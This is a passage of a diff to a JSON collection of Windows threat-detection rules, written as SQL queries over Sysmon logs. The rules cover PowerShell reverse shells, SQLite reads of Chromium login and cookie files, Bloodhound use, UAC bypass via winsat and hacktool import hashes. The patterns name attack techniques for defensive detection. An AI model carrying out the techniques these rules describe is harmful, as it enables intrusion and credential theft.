"attack.s0111", + "car.2013-08-001" ], "falsepositives": [ - "Unknown" + "Administrative activity", + "Software installation" ], "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '% group%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\') AND NOT ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_recon_group.yml" + "filename": "proc_creation_win_schtasks_creation.yml" }, { - "title": "Suspicious Reg Add Open Command", - "id": "dd3ee8cc-f751-41c9-ba53-5a32ed47e563", - "status": "test", - "description": "Threat actors performed dumping of SAM, SECURITY and SYSTEM registry hives using DelegateExecute key", - "author": "frack113", + "title": "Set Suspicious Files 
as System Files Using Attrib.EXE", + "id": "efec536f-72e8-4656-8960-5e85d091345b", + "status": "experimental", + "description": "Detects the usage of attrib with the \"+s\" option to set scripts or executables located in suspicious locations as system files to hide them from users and make them unable to be deleted with simple rights. The rule limits the search to specific extensions and directories to avoid FPs\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.defense_evasion", + "attack.t1564.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%hkcu\\\\software\\\\classes\\\\ms-settings\\\\shell\\\\open\\\\command%' ESCAPE '\\' AND CommandLine LIKE '%/ve %' ESCAPE '\\' AND CommandLine LIKE '%/d%' ESCAPE '\\') OR (CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%hkcu\\\\software\\\\classes\\\\ms-settings\\\\shell\\\\open\\\\command%' ESCAPE '\\' AND CommandLine LIKE '%/v%' ESCAPE '\\' AND CommandLine LIKE '%DelegateExecute%' ESCAPE '\\') OR (CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%hkcu\\\\software\\\\classes\\\\ms-settings%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\attrib.exe' ESCAPE '\\' OR OriginalFileName = 'ATTRIB.EXE') AND CommandLine LIKE '% +s%' ESCAPE '\\' AND (CommandLine LIKE '% \\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR 
CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.ps1%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_open_command.yml" + "filename": "proc_creation_win_attrib_system_susp_paths.yml" }, { - "title": "Use of FSharp Interpreters", - "id": "b96b2031-7c17-4473-afe7-a30ce714db29", - "status": "experimental", - "description": "The FSharp Interpreters, FsiAnyCpu.exe and FSi.exe, can be used for AWL bypass and is listed in Microsoft recommended block rules.", - "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "title": "HackTool - Bloodhound/Sharphound Execution", + "id": "f376c8a7-a2d0-4ddc-aa0c-16c17236d962", + "status": "test", + "description": "Detects command line parameters used by Bloodhound and Sharphound hack tools", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.discovery", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.001", + "attack.t1069.002", "attack.execution", - "attack.t1059" + "attack.t1059.001" ], "falsepositives": [ - "Legitimate use by a software developer." 
+ "Other programs that use these command line option and accepts an 'All' parameter" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\fsianycpu.exe' ESCAPE '\\' OR OriginalFileName = 'fsianycpu.exe' OR Image LIKE '%\\\\fsi.exe' ESCAPE '\\' OR OriginalFileName = 'fsi.exe'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Product LIKE '%SharpHound%' ESCAPE '\\' OR Description LIKE '%SharpHound%' ESCAPE '\\' OR (Company LIKE '%SpecterOps%' ESCAPE '\\' OR Company LIKE '%evil corp%' ESCAPE '\\') OR (Image LIKE '%\\\\Bloodhound.exe%' ESCAPE '\\' OR Image LIKE '%\\\\SharpHound.exe%' ESCAPE '\\')) OR (CommandLine LIKE '% -CollectionMethod All %' ESCAPE '\\' OR CommandLine LIKE '% --CollectionMethods Session %' ESCAPE '\\' OR CommandLine LIKE '% --Loop --Loopduration %' ESCAPE '\\' OR CommandLine LIKE '% --PortScanTimeout %' ESCAPE '\\' OR CommandLine LIKE '%.exe -c All -d %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Bloodhound%' ESCAPE '\\' OR CommandLine LIKE '%Get-BloodHoundData%' ESCAPE '\\') OR (CommandLine LIKE '% -JsonFolder %' ESCAPE '\\' AND CommandLine LIKE '% -ZipFileName %' ESCAPE '\\') OR (CommandLine LIKE '% DCOnly %' ESCAPE '\\' AND CommandLine LIKE '% --NoSaveCache %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_fsharp_interpreters.yml" + "filename": "proc_creation_win_hktl_bloodhound_sharphound.yml" }, { - "title": "Curl.EXE Execution", - "id": "bbeaed61-1990-4773-bf57-b81dbad7db2d", + "title": "Suspicious File Characteristics Due to Missing Fields", + "id": "9637e8a5-7131-4f7f-bdc7-2b05d8670c43", "status": "test", - "description": "Detects a curl process start on Windows, which could indicates a file download from a remote location or a simple web request to a remote server", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Executables in the 
Downloads folder without FileVersion,Description,Product,Company likely created with py2exe", + "author": "Markus Neis, Sander Wiebing", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.execution", + "attack.t1059.006" ], "falsepositives": [ - "Scripts created by developers and admins", - "Administrative activity" + "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Description LIKE '\\?' ESCAPE '\\' AND FileVersion LIKE '\\?' ESCAPE '\\') OR (Description LIKE '\\?' ESCAPE '\\' AND Product LIKE '\\?' ESCAPE '\\')) OR (Description LIKE '\\?' ESCAPE '\\' AND Company LIKE '\\?' ESCAPE '\\')) AND Image LIKE '%\\\\Downloads\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_curl_execution.yml" + "filename": "proc_creation_win_susp_file_characteristics.yml" }, { - "title": "Potential CVE-2022-26809 Exploitation Attempt", - "id": "a7cd7306-df8b-4398-b711-6f3e4935cf16", - "status": "experimental", - "description": "Detects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809)", - "author": "Florian Roth (Nextron Systems)", + "title": "Remote Code Execute via Winrm.vbs", + "id": "9df0dd3a-1a5c-47e3-a2bc-30ed177646a0", + "status": "test", + "description": "Detects an attempt to execute code or create service on remote host via winrm.vbs.", + "author": "Julia Fomina, oscd.community", "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.execution", - "attack.t1569.002" + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ - "Unknown", - "Some cases in which the service spawned a werfault.exe process" + "Unknown" ], - 
"level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k RPCSS%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR OriginalFileName = 'cscript.exe') AND (CommandLine LIKE '%winrm%' ESCAPE '\\' AND CommandLine LIKE '%invoke Create wmicimv2/Win32\\_%' ESCAPE '\\' AND CommandLine LIKE '%-r:http%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2022_26809_rpcss_child_process_anomaly.yml" + "filename": "proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml" }, { - "title": "SQLite Chromium Profile Data DB Access", - "id": "24c77512-782b-448a-8950-eddb0785fc71", + "title": "Suspicious Msbuild Execution By Uncommon Parent Process", + "id": "33be4333-2c6b-44f4-ae28-102cdbde0a31", "status": "experimental", - "description": "Detect usage of the \"sqlite\" binary to query databases in Chromium-based browsers for potential data stealing.", - "author": "TropChaud", + "description": "Detects suspicious execution of 'Msbuild.exe' by a uncommon parent process", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1539", - "attack.t1555.003", - "attack.collection", - "attack.t1005" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product = 'SQLite' OR (Image LIKE '%\\\\sqlite.exe' ESCAPE '\\' OR Image LIKE '%\\\\sqlite3.exe' ESCAPE '\\')) AND (CommandLine LIKE '%\\\\User Data\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Opera Software\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ChromiumViewer\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%Login Data%' ESCAPE '\\' OR 
CommandLine LIKE '%Cookies%' ESCAPE '\\' OR CommandLine LIKE '%Web Data%' ESCAPE '\\' OR CommandLine LIKE '%History%' ESCAPE '\\' OR CommandLine LIKE '%Bookmarks%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\MSBuild.exe' ESCAPE '\\' OR OriginalFileName = 'MSBuild.exe') AND NOT ((ParentImage LIKE '%\\\\devenv.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\python.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nuget.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sqlite_chromium_profile_data.yml" + "filename": "proc_creation_win_msbuild_susp_parent_process.yml" }, { - "title": "Suspicious Git Clone", - "id": "aef9d1f1-7396-4e92-a927-4567c7a495c1", - "status": "experimental", - "description": "Detects execution of \"git\" in order to clone a remote repository that contain suspicious keywords which might be suspicious", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Execution of Shutdown", + "id": "34ebb878-1b15-4895-b352-ca2eeb99b274", + "status": "test", + "description": "Use of the commandline to shutdown or reboot windows", + "author": "frack113", "tags": [ - "attack.reconnaissance", - "attack.t1593.003" + "attack.impact", + "attack.t1529" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\git.exe' ESCAPE '\\' OR Image LIKE '%\\\\git-remote-https.exe' ESCAPE '\\') OR OriginalFileName = 'git.exe') AND (CommandLine LIKE '% clone %' ESCAPE '\\' OR CommandLine LIKE '%git-remote-https %' ESCAPE '\\') AND (CommandLine LIKE '%exploit%' ESCAPE '\\' OR CommandLine LIKE '%Vulns%' ESCAPE '\\' OR CommandLine LIKE '%vulnerability%' ESCAPE '\\' OR CommandLine LIKE 
'%RemoteCodeExecution%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%CVE-%' ESCAPE '\\' OR CommandLine LIKE '%poc-%' ESCAPE '\\' OR CommandLine LIKE '%ProofOfConcept%' ESCAPE '\\' OR CommandLine LIKE '%proxyshell%' ESCAPE '\\' OR CommandLine LIKE '%log4shell%' ESCAPE '\\' OR CommandLine LIKE '%eternalblue%' ESCAPE '\\' OR CommandLine LIKE '%eternal-blue%' ESCAPE '\\' OR CommandLine LIKE '%MS17-%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\shutdown.exe' ESCAPE '\\' AND (CommandLine LIKE '%/r %' ESCAPE '\\' OR CommandLine LIKE '%/s %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_git_susp_clone.yml" + "filename": "proc_creation_win_shutdown_execution.yml" }, { - "title": "Suspicious Tasklist Discovery Command", - "id": "63332011-f057-496c-ad8d-d2b6afb27f96", - "status": "test", - "description": "Adversaries may attempt to get information about running processes on a system. 
Information obtained could be used to gain an understanding of common software/applications running on systems within the network", - "author": "frack113", + "title": "Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet", + "id": "c8a180d6-47a3-4345-a609-53f9c3d834fc", + "status": "experimental", + "description": "Detects suspicious reconnaissance command line activity on Windows systems using the PowerShell Get-LocalGroupMember Cmdlet", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.discovery", - "attack.t1057" + "attack.t1087.001" ], "falsepositives": [ - "Administrator, hotline ask to user" + "Administrative activity" ], - "level": "informational", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%tasklist%' ESCAPE '\\' OR Image LIKE '%\\\\tasklist.exe' ESCAPE '\\' OR OriginalFileName = 'tasklist.exe'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Get-LocalGroupMember %' ESCAPE '\\' AND (CommandLine LIKE '%domain admins%' ESCAPE '\\' OR CommandLine LIKE '% administrator%' ESCAPE '\\' OR CommandLine LIKE '% administrateur%' ESCAPE '\\' OR CommandLine LIKE '%enterprise admins%' ESCAPE '\\' OR CommandLine LIKE '%Exchange Trusted Subsystem%' ESCAPE '\\' OR CommandLine LIKE '%Remote Desktop Users%' ESCAPE '\\' OR CommandLine LIKE '%Utilisateurs du Bureau à distance%' ESCAPE '\\' OR CommandLine LIKE '%Usuarios de escritorio remoto%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_tasklist_basic_execution.yml" + "filename": "proc_creation_win_powershell_get_localgroup_member_recon.yml" }, { - "title": "Potential Powershell ReverseShell Connection", - "id": "edc2f8ae-2412-4dfd-b9d5-0c57727e70be", - "status": "stable", - "description": "Detects usage of the \"TcpClient\" class. Which can be abused to establish remote connections and reverse-shells. 
As seen used by the Nishang \"Invoke-PowerShellTcpOneLine\" reverse shell.", - "author": "FPT.EagleEye, wagga", + "title": "UAC Bypass Abusing Winsat Path Parsing - Process", + "id": "7a01183d-71a2-46ad-ad5c-acd989ac1793", + "status": "test", + "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Administrative might use this function to check network connectivity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND (CommandLine LIKE '% System.Net.Sockets.TCPClient%' ESCAPE '\\' AND CommandLine LIKE '%.GetBytes%' ESCAPE '\\' AND CommandLine LIKE '%.Write%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND IntegrityLevel IN ('High', 'System') AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winsat.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows \\\\system32\\\\winsat.exe%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_reverse_shell_connection.yml" + "filename": "proc_creation_win_uac_bypass_winsat.yml" }, { - "title": "Shell32 DLL Execution in Suspicious Directory", - "id": "32b96012-7892-429e-b26c-ac2bf46066ff", + "title": "Suspicious Mstsc.EXE Execution With Local RDP File", + "id": "6e22722b-dfb1-4508-a911-49ac840b40f8", "status": "experimental", - "description": "Detects shell32.dll executing a DLL in a suspicious directory", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects potential RDP connection via Mstsc using a local \".rdp\" 
file located in suspicious locations.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218.011" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Likelihood is related to how often the paths are used in the environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%shell32.dll%' ESCAPE '\\' AND CommandLine LIKE '%Control\\_RunDLL%' ESCAPE '\\' AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%LocalAppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR OriginalFileName = 'mstsc.exe') AND (CommandLine LIKE '%.rdp' ESCAPE '\\' OR CommandLine LIKE '%.rdp\"' ESCAPE '\\') AND (CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\color%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\System32\\\\Tasks\\_Migrated %' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Tracing\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_shell32_susp_execution.yml" + "filename": "proc_creation_win_mstsc_run_local_rdp_file_susp_location.yml" }, { - "title": 
"Suspicious Hacktool Execution - Imphash", - "id": "24e3e58a-646b-4b50-adef-02ef935b9fc8", + "title": "File Download Via Curl.EXE", + "id": "9a517fca-4ba3-4629-9278-a68694697b81", "status": "experimental", - "description": "Detects the execution of different Windows based hacktools via their import hash (imphash) even if the files have been renamed", + "description": "Detects file download using curl.exe", "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.command_and_control", + "attack.t1105" + ], "falsepositives": [ - "Legitimate use of one of these tools" + "Scripts created by developers and admins", + "Administrative activity", + "The \"\\Git\\usr\\bin\\sh.exe\" process uses the \"--output\" flag to download a specific file in the temp directory with the pattern \"gfw-httpget-xxxxxxxx.txt \"" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Imphash IN ('bcca3c247b619dcd13c8cdff5f123932', '3a19059bd7688cb88e70005f18efc439', 'bf6223a49e45d99094406777eb6004ba', '0c106686a31bfe2ba931ae1cf6e9dbc6', '0d1447d4b3259b3c2a1d4cfb7ece13c3', '1b0369a1e06271833f78ffa70ffb4eaf', '4c1b52a19748428e51b14c278d0f58e3', '4d927a711f77d62cebd4f322cb57ec6f', '66ee036df5fc1004d9ed5e9a94a1086a', '672b13f4a0b6f27d29065123fe882dfc', '6bbd59cea665c4afcc2814c1327ec91f', '725bb81dc24214f6ecacc0cfb36ad30d', '9528a0e91e28fbb88ad433feabca2456', '9da6d5d77be11712527dcab86df449a3', 'a6e01bc1ab89f8d91d9eab72032aae88', 'b24c5eddaea4fe50c6a96a2a133521e4', 'd21bbc50dcc169d7b4d0f01962793154', 'fcc251cceae90d22c392215cc9a2d5d6', '23867a89c2b8fc733be6cf5ef902f2d1', 'a37ff327f8d48e8a4d2f757e1b6e70bc', 'f9a28c458284584a93b14216308d31bd', '6118619783fc175bc7ebecff0769b46e', '959a83047e80ab68b368fdb3f4c6e4ea', '563233bfa169acc7892451f71ad5850a', '87575cb7a0e0700eb37f2e3668671a08', '13f08707f759af6003837a150a371ba1', '1781f06048a7e58b323f0b9259be798b', 
'233f85f2d4bc9d6521a6caae11a1e7f5', '24af2584cbf4d60bbe5c6d1b31b3be6d', '632969ddf6dbf4e0f53424b75e4b91f2', '713c29b396b907ed71a72482759ed757', '749a7bb1f0b4c4455949c0b2bf7f9e9f', '8628b2608957a6b0c6330ac3de28ce2e', '8b114550386e31895dfab371e741123d', '94cb940a1a6b65bed4d5a8f849ce9793', '9d68781980370e00e0bd939ee5e6c141', 'b18a1401ff8f444056d29450fbc0a6ce', 'cb567f9498452721d77a451374955f5f', '730073214094cd328547bf1f72289752', '17b461a082950fc6332228572138b80c', 'dc25ee78e2ef4d36faa0badf1e7461c9', '819b19d53ca6736448f9325a85736792', '829da329ce140d873b4a8bde2cbfaa7e', 'c547f2e66061a8dffb6f5a3ff63c0a74', '0588081ab0e63ba785938467e1b10cca', '0d9ec08bac6c07d9987dfd0f1506587c', 'bc129092b71c89b4d4c8cdf8ea590b29', '4da924cf622d039d58bce71cdf05d242', 'e7a3a5c377e2d29324093377d7db1c66', '9a9dbec5c62f0380b4fa5fd31deffedf', 'af8a3976ad71e5d5fdfb67ddb8dadfce', '0c477898bbf137bbd6f2a54e3b805ff4', '0ca9f02b537bcea20d4ea5eb1a9fe338', '3ab3655e5a14d4eefc547f4781bf7f9e', 'e6f9d5152da699934b30daab206471f6', '3ad59991ccf1d67339b319b15a41b35d', 'ffdd59e0318b85a3e480874d9796d872', '0cf479628d7cc1ea25ec7998a92f5051', '07a2d4dcbd6cb2c6a45e6b101f0b6d51', 'd6d0f80386e1380d05cb78e871bc72b1', '38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650', 'ada161bf41b8e5e9132858cb54cab5fb', '2a1bc4913cd5ecb0434df07cb675b798', '11083e75553baae21dc89ce8f9a195e4', 'a23d29c9e566f2fa8ffbb79267f5df80', '4a07f944a83e8a7c2525efa35dd30e2f', '767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b', 'a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2', '32089b8851bbf8bc2d014e9f37288c83', '09D278F9DE118EF09163C6140255C690', 
'03866661686829d806989e2fc5a72606', 'e57401fbdadcd4571ff385ab82bd5d6d', '84B763C45C0E4A3E7CA5548C710DB4EE', '19584675d94829987952432e018d5056', '330768a4f172e10acb6287b87289d83b') OR (Hashes LIKE '%IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3A19059BD7688CB88E70005F18EFC439%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=bf6223a49e45d99094406777eb6004ba%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4C1B52A19748428E51B14C278D0F58E3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=672B13F4A0B6F27D29065123FE882DFC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9528A0E91E28FBB88AD433FEABCA2456%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=D21BBC50DCC169D7B4D0F01962793154%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=F9A28C458284584A93B14216308D31BD%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6118619783FC175BC7EBECFF0769B46E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=563233BFA169ACC7892451F71AD5850A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=87575CB7A0E0700EB37F2E3668671A08%' ESCAPE '\\' OR Hashes LIKE 
'%IMPHASH=13F08707F759AF6003837A150A371BA1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1781F06048A7E58B323F0B9259BE798B%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=713C29B396B907ED71A72482759ED757%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8B114550386E31895DFAB371E741123D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9D68781980370E00E0BD939EE5E6C141%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=B18A1401FF8F444056D29450FBC0A6CE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=CB567F9498452721D77A451374955F5F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=730073214094CD328547BF1F72289752%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=17B461A082950FC6332228572138B80C%' ESCAPE '\\' OR Hashes LIKE 